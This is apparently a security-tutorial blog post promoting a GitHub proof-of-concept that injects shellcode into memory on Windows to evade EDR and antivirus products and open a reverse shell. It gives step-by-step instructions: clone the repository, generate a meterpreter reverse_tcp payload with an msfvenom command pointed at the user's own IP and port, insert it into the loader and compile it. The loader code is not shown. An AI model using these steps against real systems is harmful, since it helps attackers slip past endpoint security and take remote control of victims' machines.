Cyber security

EDR-Antivirus-Bypass-To-Gain-Shell-Access

This repository contains a proof-of-concept (PoC) for bypassing EDR and antivirus solutions using a memory injection technique.

The code executes shellcode that spawns a reverse shell, successfully evading detection by various security mechanisms.

Description

This project demonstrates how to bypass EDR and antivirus protection using Windows API functions such as VirtualAlloc, CreateThread, and WaitForSingleObject.

The payload is injected directly into the process memory without being detected by security tools, establishing a connection to a remote system for a reverse shell.

Features

  • Bypasses standard EDR and antivirus solutions
  • Executes shellcode in memory to create a reverse shell
  • Utilizes VirtualAlloc and CreateThread to inject the payload directly into process memory

Requirements

  • Windows Operating System (Tested on Windows 11 Pro)
  • Kali Linux (For reverse shell listener)
  • Visual Studio or any C# compiler

Steps To Compile And Run

1. Clone The Repository

https://github.com/murat-exp/EDR-Antivirus-Bypass-to-Gain-Shell-Access.git
cd EDR-Antivirus-Bypass-Shell-Access

2. Modify Shellcode

Before compiling, ensure that you modify the shellcode to point to your own IP address and port for the reverse shell. You can generate shellcode using msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=<YOUR_PORT> -f csharp

Replace the byte[] buf section in Program.cs with the shellcode you just generated.

3. Compile The Code

Open the project in Visual Studio, or use the following command to compile the code using the .NET SDK:

csc loader.cs

**Alternatively, you can compile in Release mode for better optimization:

csc -optimize loader.cs

For more information click here.

Tamil S

Tamil has a great interest in the fields of Cyber Security, OSINT, and CTF projects. Currently, he is deeply involved in researching and publishing various security tools with Kali Linux Tutorials, which is quite fascinating.

Recent Posts

Operation Archive – Documenting The Dark Web’s Takedown

This repository will be used to add documents, pictures, etc on LEA efforts; Indictments, Seizure…

21 hours ago

Java Deserialization Cheat Sheet – Detecting And Exploiting Vulnerabilities

A cheat sheet for pentesters and researchers about deserialization vulnerabilities in various Java (JVM) serialization…

21 hours ago

RedELK – Enhancing Red Team Operations And Blue Team Detection Through Centralized SIEM

Short: a Red Team's SIEM. Longer: a Red Team's SIEM that serves two main goals:…

2 days ago

SharpTerminator – A Guide To Automating AV/EDR Disruption With C# Port

C# port of ZeroMemoryEx's Terminator, so all hail goes to him. Usage You can download…

2 days ago

RedELK Server – DeploymentEssential Configuration Variables Overview

We delve into the process of setting up a RedELK server, focusing on the critical…

2 days ago

RedELK-Client : Deploying Cybersecurity Monitoring With Ansible

The RedELK client components using Ansible, a powerful automation tool that streamlines the installation and…

2 days ago